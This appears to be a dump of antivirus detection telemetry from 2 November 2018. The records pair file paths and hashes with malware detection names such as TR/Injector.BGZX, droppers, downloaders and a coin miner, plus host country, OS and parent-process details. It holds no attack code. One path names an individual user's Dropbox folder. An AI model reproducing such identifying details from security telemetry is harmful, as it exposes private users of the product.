  Row(detection=Row(filename='mhautopatch_d7152bac.exe', filepath='C:\\Users\\X\\Desktop\\msoxh\\msoxh\\MHAutoPatch_d7152bac.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe20_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe20 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T10:58:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111426-5160cecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92129e13\\AVSCAN-20181102-111312-42445F9E\\AVSCAN-20181102-111426-5160CECD', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151607-b461cb71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae15aaa\\AVSCAN-20181102-151239-915D24CF\\AVSCAN-20181102-151607-B461CB71', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_workspace_ws_042.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_API\\dwr_workspace_ws_042.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='15f915639c51036e955a3c1151c5a07979d4164f31a01b04f9405e5bb7e54b84', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D88B04B4BC6AE15EF14B0E49C9B9673E3696FFC344533066BBE116EE15FFC48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oceandrv.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\OCEANDRV\\OCEANDRV.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rcnuaqli.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\rCNUaqlI.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054252-1c52d357', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054252-1C52D357', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161157-717c8784', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-161157-717C8784', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061203-2ff7a8d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061203-2FF7A8D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113438-1e734182', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91bd8850\\AVSCAN-20181102-113236-0BCE7E9D\\AVSCAN-20181102-113438-1E734182', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:37:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054523-75ff8c6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054523-75FF8C6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050315-937fff1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050315-937FFF1E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055625-009d2ed9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055625-009D2ED9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000760b', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000760b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053150-91b1e6de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053150-91B1E6DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054521-755590da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054521-755590DA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T185056-00015/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051525-46afa7b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051525-46AFA7B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054532-7bc2cad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054532-7BC2CAD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055608-f6c2fd57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055608-F6C2FD57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053120-7f93c7e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053120-7F93C7E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052559-c0900cb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052559-C0900CB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145619-2645dc31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145619-2645DC31', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cisland.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\CISLAND\\CISLAND.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090950-211d56a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0e3a42d\\AVSCAN-20181102-090546-025CE972\\AVSCAN-20181102-090950-211D56A0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:09:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054755-d0acf78f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054755-D0ACF78F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052216-3ba02ef8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052216-3BA02EF8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060334-005a7fcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060334-005A7FCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053531-153b8a4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053531-153B8A4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052404-7c14fe9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052404-7C14FE9C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052338-6c94505c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052338-6C94505C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061716-ea67b6d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061716-EA67B6D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055635-06e70505', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055635-06E70505', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055057-3d1e6ca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055057-3D1E6CA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051843-bc80f128', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051843-BC80F128', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054946-12c09e6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054946-12C09E6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052905-2f78ce00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052905-2F78CE00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060746-96e79b8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060746-96E79B8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061154-2ab6f031', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061154-2AB6F031', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052902-2d5af4a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052902-2D5AF4A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:00Z'), dt=datetime.date(2018, 11, 2)),
